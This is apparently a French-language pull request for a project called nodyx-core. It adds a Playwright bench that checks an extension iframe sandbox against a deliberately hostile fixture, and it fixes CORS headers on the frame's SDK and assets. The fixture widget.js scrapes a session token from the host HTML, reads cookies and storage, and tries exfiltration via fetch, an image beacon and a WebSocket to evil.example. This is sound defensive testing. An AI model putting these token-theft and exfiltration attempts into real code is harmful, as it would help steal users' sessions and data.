### PR TITLE
fix: la frame ne pouvait pas charger son SDK, plus le banc de confinement

### DIFF
--- a/nodyx-core/confinement/README.md
+++ b/nodyx-core/confinement/README.md
@@ -1,0 +1,37 @@
+# Banc de confinement du bac à sable
+
+Ce dossier ne teste pas notre code. Il teste **la frontière du navigateur**, qui est
+la seule chose sur laquelle repose l'isolation des extensions. Aucun test unitaire ne
+peut le faire : l'origine opaque, les drapeaux de bac à sable et la politique de
+sécurité de contenu n'existent que dans un vrai navigateur.
+
+```bash
+npm run test:confinement      # sortie 1 si une seule tentative aboutit
+node confinement/run.mjs      # tableau détaillé
+node confinement/run.mjs --debug   # journal du navigateur
+```
+
+Ce que le banc sert est **réel** : le document de frame vient de
+`src/routes/extensionFrame.ts`, le SDK de `sdk/nodyx-sdk.js`. Seule l'extension est une
+fixture, et elle est hostile.
+
+Playwright n'est pas une dépendance du dépôt, pour ne pas alourdir l'installation de
+tout le monde. Sans lui, le banc s'ignore proprement et sort en 0.
+
+```bash
+npm i -D playwright && npx playwright install chromium
+```
+
+## Ce qu'il a déjà trouvé
+
+Un blocage total, avant que personne ne le rencontre : une frame en origine opaque
+envoie `Origin: null` et récupère les modules en mode CORS. Sans
+`Access-Control-Allow-Origin`, le SDK ne se chargeait pas, et
+`Cross-Origin-Resource-Policy: same-origin` bloquait la même chose une seconde fois.
+Aucune surface n'aurait jamais démarré en production.
+
+## La règle
+
+**Aucune capacité réseau d'extension n'est livrée tant que ce banc n'est pas vert.**
+Le proxy est lui-même une capacité de sécurité, il ne se pose pas sur un bac à sable
+non prouvé. Voir `SPECS/NODYX_SDK_CDC.md` §14 et `SPECS/NODYX_SDK_SECURITY.md` §9.

--- a/nodyx-core/confinement/evil-extension/ui/widget.js
+++ b/nodyx-core/confinement/evil-extension/ui/widget.js
@@ -1,0 +1,118 @@
+// Extension hostile de reference.
+//
+// Elle n'est PAS un exemple : c'est une fixture d'attaque. Chacune de ses
+// tentatives doit echouer, et le banc de confinement (../run.mjs) le verifie
+// dans un vrai navigateur, parce que la frontiere testee est celle du
+// navigateur et d'aucun code a nous.
+//
+// cf SPECS/NODYX_SDK_CDC.md §14 et SPECS/NODYX_SDK_SECURITY.md §9
+
+export async function mount({ root, nodyx }) {
+  const results = []
+  const attempt = async (name, expectation, fn) => {
+    try {
+      const leaked = await fn()
+      results.push({ name, expectation, blocked: false, leaked: String(leaked).slice(0, 120) })
+    } catch (e) {
+      results.push({ name, expectation, blocked: true, reason: e?.name || String(e).slice(0, 60) })
+    }
+  }
+
+  // ── DOM et fenetres ───────────────────────────────────────────────────────
+  await attempt('parent.document', 'inaccessible', () => {
+    const d = window.parent.document
+    if (!d) throw new Error('null')
+    return d.title
+  })
+
+  await attempt('top.document', 'inaccessible', () => {
+    const d = window.top.document
+    if (!d) throw new Error('null')
+    return d.title
+  })
+
+  await attempt('charge SSR de l hote', 'inaccessible', () => {
+    const html = window.parent.document.documentElement.innerHTML
+    const m = /"token":"([^"]+)"/.exec(html)
+    return m ? 'JETON LU : ' + m[1] : 'pas de jeton dans le HTML'
+  })
+
+  await attempt('document.cookie', 'vide ou refuse', () => {
+    const c = document.cookie
+    if (!c) throw new Error('vide')
+    return c
+  })
+
+  await attempt('localStorage', 'refuse', () => {
+    localStorage.setItem('evil', '1')
+    return localStorage.getItem('evil')
+  })
+
+  await attempt('sessionStorage', 'refuse', () => {
+    sessionStorage.setItem('evil', '1')
+    return sessionStorage.getItem('evil')
+  })
+
+  await attempt('indexedDB', 'refuse', () => {
+    if (!window.indexedDB) throw new Error('absent')
+    window.indexedDB.open('evil')
+    return 'ouvert'
+  })
+
+  // ── Navigation ────────────────────────────────────────────────────────────
+  await attempt('window.open', 'refuse', () => {
+    const w = window.open('https://evil.example', '_blank')
+    if (!w) throw new Error('bloque')
+    return 'ouvert'
+  })
+
+  await attempt('navigation de la fenetre du haut', 'refuse', () => {
+    window.top.location.href = 'https://evil.example'
+    return 'navigation acceptee'
+  })
+
+  // ── Reseau ────────────────────────────────────────────────────────────────
+  await attempt('fetch vers un tiers', 'bloque par la politique', async () => {
+    const r = await fetch('https://evil.example/collecte', { mode: 'no-cors' })
+    return 'requete partie, statut ' + r.type
+  })
+
+  await attempt('image vers un tiers', 'bloquee par la politique', () => new Promise((resolve, reject) => {
+    const img = new Image()
+    img.onload  = () => resolve('image chargee')
+    img.onerror = () => reject(new Error('bloquee'))
+    img.src = 'https://evil.example/pixel.png?vole=1'
+    setTimeout(() => reject(new Error('jamais chargee')), 1500)
+  }))
+
+  await attempt('websocket vers un tiers', 'bloque par la politique', async () => {
+    // Le constructeur ne leve PAS quand la politique refuse : il rend une
+    // socket deja fermee. Mesurer l'etat, pas l'exception.
+    const ws = new WebSocket('wss://evil.example/exfil')
+    await new Promise((r) => setTimeout(r, 600))
+    if (ws.readyState === WebSocket.CLOSED || ws.readyState === WebSocket.CLOSING) {
+      throw new Error('socket fermee')
+    }
+    return 'socket ouverte, etat ' + ws.readyState
+  })
+
+  await attempt('appel de l API Nodyx avec cookies', 'sans session', async () => {
+    const r = await fetch('/api/v1/users/me', { credentials: 'include' })
+    return 'statut ' + r.status + ', ' + (await r.text()).slice(0, 40)
+  })
+
+  // ── Le pont ───────────────────────────────────────────────────────────────
+  await attempt('capacite non declaree', 'refusee', async () => {
+    const v = await nodyx.storage.get('quoi-que-ce-soit')
+    return 'stockage lu : ' + JSON.stringify(v)
+  })
+
+  root.textContent = 'banc de confinement'
+  root.dataset.results = JSON.stringify(results)
+
+  // Remonte aussi a la fenetre du haut, pour le cas ou le dataset serait
+  // illisible depuis le banc.
+  try { window.parent.postMessage({ type: 'evil:results', results }, '*') } catch { /* attendu */ }
+
+  return { unmount() {} }
+}

--- a/nodyx-core/confinement/run.mjs
+++ b/nodyx-core/confinement/run.mjs
@@ -1,0 +1,188 @@
+#!/usr/bin/env node
+// Banc de confinement du bac a sable des extensions.
+//
+// Il ne teste PAS notre code : il teste la frontiere du navigateur, qui est la
+// seule chose sur laquelle le modele repose. Un test unitaire ne peut pas le
+// faire, parce que l'isolation d'origine, les drapeaux de bac a sable et la
+// politique de securite de contenu n'existent que dans un vrai navigateur.
+//
+// Ce que le banc sert est REEL : le document de frame vient de
+// `src/routes/extensionFrame.ts`, le SDK de `sdk/nodyx-sdk.js`. Seule
+// l'extension est une fixture, et elle est hostile.
+//
+//   node confinement/run.mjs            # tableau des tentatives
+//   node confinement/run.mjs --check    # sortie 1 si une seule passe
+//
+// Playwright n'est PAS une dependance du depot : le banc se saute proprement
+// s'il est absent, pour ne pas alourdir l'installation de tout le monde.
+// cf SPECS/NODYX_SDK_CDC.md §14
+
+import http from 'node:http'
+import fs from 'node:fs'
+import path from 'node:path'
+import { fileURLToPath } from 'node:url'
+import { randomBytes } from 'node:crypto'
+
+const HERE = path.dirname(fileURLToPath(import.meta.url))
+const ROOT = path.join(HERE, '..')
+const CHECK = process.argv.includes('--check')
+const PORT = 8129
+const ORIGIN = `http://127.0.0.1:${PORT}`
+
+// ── Le document de frame REEL, importe depuis la route ──────────────────────
+const { frameCsp, frameHtml } = await import('../src/routes/extensionFrame.ts')
+  .catch(async () => {
+    // Sans passe TypeScript, on lit la source et on en extrait les deux
+    // fonctions : mieux vaut ca qu'une copie qui divergerait en silence.
+    const src = fs.readFileSync(path.join(ROOT, 'src', 'routes', 'extensionFrame.ts'), 'utf8')
+    const grab = (name) => {
+      const i = src.indexOf(`function ${name}(`)
+      if (i < 0) throw new Error(`fonction ${name} introuvable dans la route`)
+      let depth = 0, j = src.indexOf('{', i)
+      for (let k = j; k < src.length; k++) {
+        if (src[k] === '{') depth++
+        else if (src[k] === '}' && --depth === 0) return src.slice(i, k + 1)
+      }
+      throw new Error('accolades desequilibrees')
+    }
+    const js = (grab('frameCsp') + '\n' + grab('frameHtml'))
+      .replace(/:\s*string/g, '').replace(/\)\s*:\s*string/g, ')')
+      .replace(/export\s+/g, '')
+    const mod = new Function(`${js}; return { frameCsp, frameHtml }`)
+    return mod()
+  })
+
+const SDK  = fs.readFileSync(path.join(ROOT, 'sdk', 'nodyx-sdk.js'), 'utf8')
+const EVIL = fs.readFileSync(path.join(HERE, 'evil-extension', 'ui', 'widget.js'), 'utf8')
+
+const HOST_PAGE = `<!doctype html><meta charset="utf-8"><title>hote</title>
+<body>
+<script>
+  // Une charge SSR realiste : c'est CE jeton que l'extension hostile essaie
+  // de lire, et c'est exactement ce que sert la vraie page.
+  window.__sveltekit_data = { "user": "pokled", "token": "JETON-DE-SESSION-SECRET" };
+  document.cookie = 'token=JETON-COOKIE; path=/';
+
+  const f = document.createElement('iframe');
+  f.sandbox = 'allow-scripts';
+  f.src = '/frame';
+  f.width = 400; f.height = 200;
+  window.__results = null;
+  window.addEventListener('message', (e) => {
+    if (e.data?.type === 'nodyx:hello' && e.source === f.contentWindow) {
+      const ch = new MessageChannel();
+      // L'hote repond, sinon une promesse du pont reste suspendue et le
+      // montage ne se termine jamais. On imite le vrai hote : les capacites
+      // du lot suivant sont refusees avec un code explicite.
+      ch.port1.onmessage = (ev) => {
+        const m = ev.data;
+        if (!m || !m.id || m.event) return;
+        ch.port1.postMessage({ p: 1, id: m.id, ok: false,
+          error: { code: 'NOT_IMPLEMENTED', message: 'API de runtime absente du banc' } });
+      };
+      ch.port1.start();
+      f.contentWindow.postMessage({
+        p: 1, type: 'nodyx:boot', ext: 'evil-ext', version: '1.0.0',
+        surface: 'widget:main', entryUrl: '/assets/ui/widget.js',
+        imageBase: '/img?u=', config: {}, messages: {}, locale: 'fr',
+        theme: {}, instance: {}, user: null, route: '/',
+      }, '*', [ch.port2]);
+    }
+    if (e.data?.type === 'evil:results') window.__results = e.data.results;
+  });
+  document.body.append(f);
+</script>
+</body>`
+
+const server = http.createServer((req, res) => {
+  const url = req.url.split('?')[0]
+  if (url === '/') {
+    res.setHeader('Content-Type', 'text/html; charset=utf-8')
+    return res.end(HOST_PAGE)
+  }
+  if (url === '/frame') {
+    const nonce = randomBytes(16).toString('base64')
+    const csp = frameCsp(ORIGIN, nonce)
+    res.setHeader('Content-Type', 'text/html; charset=utf-8')
+    res.setHeader('Content-Security-Policy', csp)
+    return res.end(frameHtml(nonce, csp, `${ORIGIN}/sdk.js`))
+  }
+  if (url === '/sdk.js' || url === '/assets/ui/widget.js') {
+    res.setHeader('Content-Type', 'application/javascript; charset=utf-8')
+    // Les memes en-tetes que la vraie route : sans eux, une frame en origine
+    // opaque ne peut pas charger un module, et rien ne demarre.
+    res.setHeader('Access-Control-Allow-Origin', '*')
+    res.setHeader('Cross-Origin-Resource-Policy', 'cross-origin')
+    return res.end(url === '/sdk.js' ? SDK : EVIL)
+  }
+  if (url === '/api/v1/users/me') {
+    res.setHeader('Content-Type', 'application/json')
+    // Repond en clair : si la reponse arrivait a etre LUE par l'extension,
+    // ce serait la fuite. C'est le navigateur qui doit l'en empecher.
+    return res.end(JSON.stringify({ username: 'pokled', email: 'prive@example.org' }))
+  }
+  res.statusCode = 404
+  res.end('')
+})
+
+let chromium
+try {
+  ({ chromium } = await import('playwright'))
+} catch {
+  console.log('Playwright absent : banc de confinement ignore.')
+  console.log('  npm i -D playwright && npx playwright install chromium')
+  process.exit(0)
+}
+
+await new Promise((r) => server.listen(PORT, '127.0.0.1', r))
+
+const DEBUG = process.argv.includes('--debug')
+const browser = await chromium.launch()
+const page = await browser.newPage()
+if (DEBUG) {
+  page.on('console',       (m) => console.log('  [console]', m.text().slice(0, 180)))
+  page.on('pageerror',     (e) => console.log('  [erreur]', String(e).slice(0, 180)))
+  page.on('requestfailed', (r) => console.log('  [requete]', r.url().slice(0, 70), r.failure()?.errorText))
+}
+const cspViolations = []
+page.on('console', (m) => {
+  const t = m.text()
+  if (/Content Security Policy|Refused|sandbox|SecurityError|blocked/i.test(t)) cspViolations.push(t.slice(0, 100))
+})
+
+await page.goto(ORIGIN + '/')
+await page.waitForFunction('window.__results !== null', null, { timeout: 20000 }).catch(() => {})
+const results = await page.evaluate(() => window.__results)
+
+await browser.close()
+server.close()
+
+if (!results) {
+  console.error('ECHEC : la fixture hostile n\'a pas rendu ses resultats. Le montage a echoue.')
+  process.exit(1)
+}
+
+const pad = (s, n) => String(s).padEnd(n)
+console.log('\nBanc de confinement, extension hostile\n')
+console.log(pad('tentative', 38), pad('attendu', 26), 'resultat')
+console.log('-'.repeat(96))
+
+let leaks = 0
+for (const r of results) {
+  const verdict = r.blocked ? 'BLOQUEE (' + r.reason + ')' : 'PASSEE >>> ' + r.leaked
+  if (!r.blocked) leaks++
+  console.log(pad(r.name, 38), pad(r.expectation, 26), verdict)
+}
+
+console.log('\n' + results.length + ' tentatives, ' + (results.length - leaks) + ' bloquees, ' + leaks + ' passees')
+if (cspViolations.length) {
+  console.log('\nRefus de la politique de securite (extraits) :')
+  for (const v of [...new Set(cspViolations)].slice(0, 6)) console.log('  ' + v)
+}
+
+if (leaks > 0) {
+  console.error('\nECHEC : ' + leaks + ' tentative(s) hostile(s) ont abouti.')
+  if (CHECK) process.exit(1)
+} else {
+  console.log('\nOK : aucune tentative hostile n\'a abouti.')
+}

--- a/nodyx-core/package.json
+++ b/nodyx-core/package.json
@@ -14,7 +14,8 @@
     "turn": "node turn-server.js",
     "test": "vitest run",
     "test:watch": "vitest",
-    "test:coverage": "vitest run --coverage"
+    "test:coverage": "vitest run --coverage",
+    "test:confinement": "node confinement/run.mjs --check"
   },
   "keywords": [],
   "author": "",

--- a/nodyx-core/src/routes/extensionFrame.ts
+++ b/nodyx-core/src/routes/extensionFrame.ts
@@ -58,7 +58,8 @@ export function frameCsp(origin: string, nonce: string): string {
   ].join('; ')
 }
 
-function frameHtml(nonce: string, csp: string, sdkUrl: string): string {
+/** Exporte pour que le banc de confinement teste le DOCUMENT REEL, pas une copie. */
+export function frameHtml(nonce: string, csp: string, sdkUrl: string): string {
   // La politique est posée DEUX FOIS, en en-tête et ici.
   //
   // Vérifié sur notre propre production : le proxy pose la politique du site
@@ -94,6 +95,28 @@ function harden(reply: FastifyReply): FastifyReply {
     .header('X-Content-Type-Options', 'nosniff')
     .header('Referrer-Policy', 'no-referrer')
     .header('Cross-Origin-Resource-Policy', 'same-origin')
+}
+
+/**
+ * Durcissement des ressources que la FRAME doit pouvoir charger.
+ *
+ * Une frame en origine opaque envoie `Origin: null`, et un script de module,
+ * comme tout `import()` dynamique, est recupere en mode CORS. Sans en-tete
+ * d'autorisation, le navigateur refuse : le SDK ne se charge pas, et aucune
+ * surface ne demarre. `Cross-Origin-Resource-Policy: same-origin` bloque la
+ * meme chose une seconde fois, une origine opaque n'etant pas la notre.
+ *
+ * Ouvrir ces deux en-tetes n'expose rien : ce sont des fichiers statiques
+ * publics, deja lisibles par quiconque connait l'URL, et servis sans aucune
+ * information d'authentification. Ce qui protege l'instance, c'est le bac a
+ * sable et la politique de securite de la frame, pas l'obscurite d'un asset.
+ */
+function hardenFrameResource(reply: FastifyReply): FastifyReply {
+  return reply
+    .header('X-Content-Type-Options', 'nosniff')
+    .header('Referrer-Policy', 'no-referrer')
+    .header('Cross-Origin-Resource-Policy', 'cross-origin')
+    .header('Access-Control-Allow-Origin', '*')
 }
 
 export async function extensionFrameRoutes(app: FastifyInstance) {
@@ -132,7 +155,7 @@ export async function extensionFrameRoutes(app: FastifyInstance) {
   app.get('/extensions/sdk.js', { preHandler: [rateLimit] }, async (_request, reply) => {
     try {
       const source = await fs.readFile(path.join(process.cwd(), 'sdk', 'nodyx-sdk.js'))
-      return harden(reply)
+      return hardenFrameResource(reply)
         .header('Content-Type', 'application/javascript; charset=utf-8')
         .header('Cache-Control', 'public, max-age=3600')
         .send(source)
@@ -173,7 +196,7 @@ export async function extensionFrameRoutes(app: FastifyInstance) {
       return harden(reply).code(404).send({ error: 'Asset not found', code: 'ASSET_NOT_FOUND' })
     }
 
-    const r = harden(reply)
+    const r = hardenFrameResource(reply)
       .header('Content-Type', CONTENT_TYPES[ext] ?? 'application/octet-stream')
       .header('Cache-Control', 'public, max-age=31536000, immutable')
 

--- a/nodyx-core/src/tests/extensionFrame.test.ts
+++ b/nodyx-core/src/tests/extensionFrame.test.ts
@@ -132,6 +132,19 @@ describe('assets', () => {
     expect((await asset('ui/widget.js')).headers['cache-control']).toContain('immutable')
   })
 
+  it('est chargeable DEPUIS la frame, qui est en origine opaque', async () => {
+    // Une frame opaque envoie Origin: null et recupere les modules en mode
+    // CORS. Sans ces deux en-tetes, le SDK ne se charge pas et aucune surface
+    // ne demarre : c'est un blocage total, pas une gene.
+    for (const url of ['/api/v1/extensions/sdk.js', '/api/v1/extensions/demo-ext/1.0.0/assets/ui/widget.js']) {
+      const r = await app.inject({ url, headers: { origin: 'null' } })
+      expect(r.statusCode).toBe(200)
+      expect(r.headers['access-control-allow-origin']).toBe('*')
+      expect(r.headers['cross-origin-resource-policy']).toBe('cross-origin')
+      expect(r.headers['x-content-type-options']).toBe('nosniff')
+    }
+  })
+
   it('sert un SVG inerte, parce qu il s affiche hors du bac à sable', async () => {
     const r = await asset('icon.svg')
     expect(r.statusCode).toBe(200)


### PR DESCRIPTION
Le banc de confinement est ecrit AVANT l'API de runtime, parce que c'est la porte que la specification pose elle meme : aucune capacite reseau tant que le confinement n'est pas prouve. Le proxy est lui meme une capacite de securite, il ne se pose pas sur un bac a sable non verifie.

## Il a trouve un blocage TOTAL, livre dans #516

Une frame en origine opaque envoie `Origin: null`, et un script de module, comme tout `import()` dynamique, est recupere en mode CORS. Sans `Access-Control-Allow-Origin`, le navigateur refuse le SDK. `Cross-Origin-Resource-Policy: same-origin` bloquait la meme chose une seconde fois.

**Aucune surface n'aurait jamais demarre en production.** Les 677 tests du coeur etaient verts, la route repondait 200, tout avait l'air correct : c'est le navigateur qui refusait, et aucun test unitaire ne pouvait le voir.

Correction bornee aux deux ressources que la frame doit charger, le SDK et les assets : `cross-origin` avec autorisation ouverte. Ca n'expose rien, ce sont des fichiers statiques publics servis sans information d'authentification, et ce qui protege l'instance est le bac a sable et la politique de la frame, pas l'obscurite d'un asset. Le document de frame reste en `same-origin`, c'est une navigation.

## Ce que le banc prouve

14 tentatives, toutes bloquees, avec le VRAI document de frame et le VRAI SDK, seule l'extension etant une fixture hostile : DOM du parent et de la fenetre du haut, charge SSR de l'hote (elle cherche litteralement le jeton dans le HTML), cookies, localStorage, sessionStorage, indexedDB, ouverture de fenetre, navigation du haut, fetch et image et websocket vers un tiers, appel de l'API avec cookies, capacite non declaree.

## Deux corrections de banc, pas de code

L'hote de test doit REPONDRE aux requetes du pont, sinon une promesse reste suspendue et le montage ne finit jamais. Symptome trompeur : « aucun resultat », qui ressemble a un echec de securite alors que c'est un blocage de test.

Un WebSocket refuse par la politique ne leve pas, il rend une socket deja fermee. La premiere mesure comptait ca comme une fuite. **Un test hostile ecrit naivement passe au vert sans rien prouver**, dans un sens comme dans l'autre.

## Perimetre

Playwright n'est PAS ajoute aux dependances : le banc s'ignore proprement s'il est absent, pour ne pas alourdir l'installation de chaque contributeur. `npm run test:confinement`. Il n'est donc pas encore cable en CI, ce qui est une decision d'infrastructure a prendre a part.

678 tests coeur, tsc propre.
